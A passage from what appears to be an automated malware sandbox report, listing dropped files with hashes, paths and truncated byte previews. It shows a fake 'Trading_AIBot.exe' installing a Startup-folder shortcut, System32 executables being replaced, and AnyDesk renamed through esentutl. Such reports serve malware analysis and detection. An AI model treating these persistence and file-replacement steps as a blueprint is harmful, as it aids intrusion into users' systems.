                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vhvzlh4.5ux.ps1

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crvphli2.vbq.psm1

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wthxtqrs.hts.ps1

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\8c4bfd40d4df6ab2.bin

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.98372538260074
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:vwYb+26AVyUqPFlrSyvJAio9jrwwIAfOzye:vwYq9A1wFkiEoAfO5
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C5FCF923F08157748C04AA0D3A075A74
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BF9AA3683FD0E4A4EF1DF1411DEC7CE44A8E6EAA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E7E92999491AB41C337CFE2C20D6F1D2D88548CF2CC1AB8043B58CE4719302DD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6250089C0436BF4FD019D52D52FDF2E5EFDB9C126D4B2159446E7B6E28C6A3DF73C9075F56DC3CFEBD6ACC9152C0DE9584872E32107E9265E2EF11E44459C304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:.U8.>..pw.Lb-S=../.S.@..'..7W.wK.....l.>0...^&.?......<.w1y.....r.!...,.SX|U...4...z.O....*.<.+]g.BJ*....".{.8...?J8=P.Q.l...-.Y.Q._.|:._.8RyXX]V..."..u.l.7.......m .......I8.3.............1D........{Xk...B.vK..]..F..K.g.._.FqLAo.l.,....K..cc.......>k..[.I4>.W#......5F,4.^...h.."m`/t....t... .w...m.0..Cs....h.<<M\l..*.$..^Np....;....".....^.o..1>.X..'.l..w..D.2hh!M..g4#...r....d...(.ns..d..4..=N(a..s..U...U..0.a.m[i)..K......&.f..Tf.w.K...E<..........d..N.A..Y.Z.(Cb.v....PfZ...K..R.2i.%....K7......`..6...."%...}..//.n!I5..{..+.A..L..x.T.L.ZG.G...>....V..m^.^..."..}.[.{....n..f.. .N,.....~..o....H.)........-..va..I.}z).9'7<..P..S..y.Q.j..ID.O....1..P.u.)T...u...[.KHz..q...d..i.~.C<k....{]...h$E.(.....O.@7./..>.......3......Wy.YZ.R...W..wB.x.....q.@.z#c.........a7.0..k...R..^".`.sU.=.Y.|......=.(`".$.r...N.P..If..@rc......sG..8..."e`.Q.[......g....?Fi....(.........K..F"L.@H.6....oV...w;K..w.....y..'n..K..}w..4j..fY..1.9v..B,&...dj.&L......

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999999298369035
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:CF9744BAE8DCA89FA01C529ED42F3A18
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:71A3CE9A7DBF7A58EC07E633C62612F9CBB5142B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:01998B6C87CA756F3C44892FAA270DA1857606DD6C2EDDCEB6F15CD4F4C86DBC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A1F3112C3F0BC3B8F54F2F9644DD6F77E51EDC2773600A18A6974F31F88FCDCD35D604B405835D2E376130D6A31323C6C079DFB50546278CC6BA8882245F6381
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1810
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.4095045126518184
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:8e2CzKgWLqeMNmG9l6R+O4ZvPqRyJpqy:8F06R+ZXqRzy
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B9B080101D1661C181D515292FB5D357
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DCD1BBBE568D19631543A4339CC2724BA83E3245
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:8E9FE4BF96A88EF8BCEF4709E99B6FCB3620733539078ECFFFF99F8A4DBF06C3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:4EBA1F71935639855E34620243CBA72C0FECBCEF25C27D0CA3CEE848D6252D3C61D63292A94B652BF1634F61F8D0DBB74279250F9D93044BA735D9E5DCDB9EE9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@....................................................../....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.2.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.2537563482049645
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:UQW4qoNUgslKNX0Ip0MgHCpoMBOussqjnhMgeiCl7G0nehbGZpbD:UQW9BKNX0IPgiKMBOuYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6341995A4613FCE6AD6219013E4B7646
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A734947115A3C14940F79660F04EAA742677E699
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6977D73CEC77F46ADEBE2809D089DBADB2C7F01A76F6CDDD96687C4C33F88AF4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B5C7995E71AAF2E05FDB87FAE445495495DD3F266409D396D418377276E6326B714F705D788B79FC3C5B8548A0B18156A8AFF91F41B6401927FDA4E13A32177E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................'W.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.163547813718077
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:f2G7AbHjkbsqjnhMgeiCl7G0nehbGZpbD:f2G7AbHjeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7E1C5BCA8DE62ADD1CB8360215694BC4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:4809B60DC3607C238CC67F7A8E773224DADFF156
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4C4B1E316610A7F4405D8C6EE4446D3DA5F8DE51F4389FE8126D34ECB05ED54D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3E20D907F0C5C359F91202BAD79692B6C7B59868CB5D602258DB8DE24D2165C6CE462B51578B8B3413EFB42D6331E8E928EE6DB00D9395A8AAFB8474866B99A3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................w..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.288938921389206
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:hkdpSI+K3S/GWei+qNv2uG3jsqjnhMgeiCl7G0nehbGZpbD:h6SIGGWei2uG3nDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:91AE0BDAC8CCF3A870D04230C5CC395C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A065E9DD486ADA6D81C2C309D47095ADB2651337
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D8184E9B31202686EE7FA1E951BF053A9D53EA5935B6D02FB1BBDE5822BEA42E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EC62D5C9E67EB3A34FB8CED275AA3E00249E5D2EDB5639CF2CE450CE8BDB1626AEB34C7E1C3BD9FC1013725A02E221E7586DAFE6B2DCC415204CD2E7BF4835C1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P....... .... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.163309392911544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:YEP3R6CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:z6CsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1E467BDA5911F0899BC6AC04CDE8ACA5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:814AB7D4B9395E2B88429A46AD4CFED35788181B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:32951D46611B5D1F47B4994479EA48336164DB61BE2DC883C9C9E132DA9B71A9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:7D977E49EB7B300BD61E735594CADF05DE4762E8AD765010F1DC86C2878138C7572F8536CA9710F0BCB501A6DE1C615D562ED53AF43E3820BC4B70A10E599FCE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.....................................|.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\config\systemprofile\AppData\Roaming\8c4bfd40d4df6ab2.bin

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.987101119787822
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:g8/K7vKQ6GFWOIagVFYaT1Z8VX5UJCWooJkGX62alv2KarAkWCalUEtPwLeE6ef:jyjWj1oJACWooJk5lvY6UEhwh6ef
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:AEC764A5D1AF857F6C6590922F3DDB3B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DEC3772D8D61DA1E90C512294EFDD3EAA7DF77E9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:EFE33CC12742987CD66160457EF3AA28AF975F65B300B8345943E1E93B05D12D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:90E42E9C2FFFA6143C642B0860C23A5E657BA5C22F3B3D10BE924BEDBDB3E7A36AF76B833DDAA6AC4EA576DEA5188FD262E5582E2E592871BD7B4231070F4A9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:W.}..R{...O....Z.X..t.q!G_.mX...O.1....u.7.Z......=....j...1.../F.....|z....pYPD.e..* &!i..C.J1....\..F.@!#.l...V.......7d|..2TX{?y.W........Q?.{.e..Sx.v2.^.....j....fP..a{ ...b}...C..XO@.....E..2n$.} .om.4.=."S|..I....9...c.b...]#......@....,o.X.5.....t..j.mAK.~./.....e.O.$....Mt.E....'I"..J... `..J|E|....9&....ml.<q(o..=.V.o.E.D.P........h#.S...)..r..a....`...z*.\.:Z..-....z....jw.t.>.{.\.........h.?B..L...E+....8.Z.w...`1.7....YIk.\..<>...=.P.5t#C.u..D..`....i.....pl.!...Sj...d..gv$[u.[lz"...6[..Ez.l>+`...J...O..N........z.[.D.c..M.K.K.F.....T..v...W..W.....^P..}1..NERX...Q%...u..S.j...rZ..<.\..6.....^.p>..fc}..%MD8....n.|o..'^....I....(.S.Ij9..?..c..f..8B........G....%.o................o.FA...&W....[,:(.....h|Z;...1aq6`c..q..@s21.Qs{..<....*`a.n.o%..'...3G!`e....X.......&.....h.f.><.q...e.7)}=..<..Z.fF.Ia{..c7a.@.. ..Z..w....Y~.l.(...,;B.k?4PFZ....u..uF1..!y1X.....F.%..(..>d..D.'\..^......._......*...@.p.8..zv...?)._k.cx.j<..W....^E...+...

                                                                                                                                                                                                                                                                                                                                                                                                                                      \Device\ConDrv

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):590
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.641306414537991
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:qzBBVmXxTzmBzeSbZ7u0wxDDDDDDDDjCaY5+8VQlaYAZbTB8NGNZ:iBB0XxTzkzp7u0wQakj6azt8N2
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:07CD550BE7A4071DACEC06B8EA394E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2B6DEB5E54C501C56A236A0B1A80F9062DD82E10
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:2EB716BAD1EEA76E0E1AFF98E8816F462828A911E3260D8A78044353395F4E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:67D949AB677B5D9A4D85CE97E9301A57DF82B13B20A424C65CE1F0E79C61ECBEA1853C22DA3B35176DFA747E59EC727DD8C4E29EDE88E3FBA89B9058B13D0689
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12ea00 (1239552) (1 MB)....Total bytes written = 0x12f000 (1241088) (1 MB).......Operation completed successfully in 0.203 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                                      \Device\Null

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.532578488470501
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
